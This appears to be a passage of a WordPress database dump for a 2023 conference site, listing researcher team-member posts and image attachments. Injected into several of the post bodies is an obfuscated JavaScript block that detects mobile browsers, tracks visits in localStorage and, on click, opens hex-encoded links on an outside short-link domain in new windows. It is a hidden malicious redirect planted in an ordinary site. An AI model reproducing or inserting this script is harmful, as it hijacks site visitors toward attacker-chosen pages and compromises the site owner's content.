_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Thomas Blaschke</strong>','','publish','open','closed','','thomas-blaschke','','','2022-11-04 20:18:32','2022-11-04 20:18:32','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2982',0,'dt_team','',0),
(2983,1,'2022-11-04 20:18:09','2022-11-04 20:18:09','','ws186','','inherit','open','closed','','ws186','','','2022-11-04 20:18:09','2022-11-04 20:18:09','',2982,'https://gsw2023.com/wp-content/uploads/2022/11/ws186.jpg',0,'attachment','image/jpeg',0),
(2984,1,'2022-11-04 20:20:41','2022-11-04 20:20:41','<!-- wp:paragraph -->\n<p>Budapest University of Technology and Economics, HUNGARY</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>(ICWG III/IVb)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Zsófia Kugler','','publish','open','closed','','zsofia-kugler','','','2022-11-04 20:20:43','2022-11-04 20:20:43','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2984',0,'dt_team','',0),
(2985,1,'2022-11-04 20:20:04','2022-11-04 20:20:04','','ws186','','inherit','open','closed','','ws186-2','','','2022-11-04 20:20:04','2022-11-04 20:20:04','',2984,'https://gsw2023.com/wp-content/uploads/2022/11/ws186-1.jpg',0,'attachment','image/jpeg',0),
(2986,1,'2022-11-04 20:20:19','2022-11-04 20:20:19','','ws187','','inherit','open','closed','','ws187','','','2022-11-04 20:20:19','2022-11-04 20:20:19','',2984,'https://gsw2023.com/wp-content/uploads/2022/11/ws187.jpg',0,'attachment','image/jpeg',0),
(2987,1,'2022-11-04 20:21:58','2022-11-04 20:21:58','<!-- wp:paragraph -->\n<p>Karlsruhe Institute of Technology, GERMANY</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>(WG IV/4)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Friederike Reitze</strong>','','publish','open','closed','','friederike-reitze','','','2022-11-04 20:22:00','2022-11-04 20:22:00','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2987',0,'dt_team','',0),
(2988,1,'2022-11-04 20:21:43','2022-11-04 20:21:43','','ws188','','inherit','open','closed','','ws188','','','2022-11-04 20:21:43','2022-11-04 20:21:43','',2987,'https://gsw2023.com/wp-content/uploads/2022/11/ws188.jpg',0,'attachment','image/jpeg',0),
(2989,1,'2022-11-04 20:23:45','2022-11-04 20:23:45','<!-- wp:paragraph -->\n<p> Toronto Metropolitan University, Canada</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 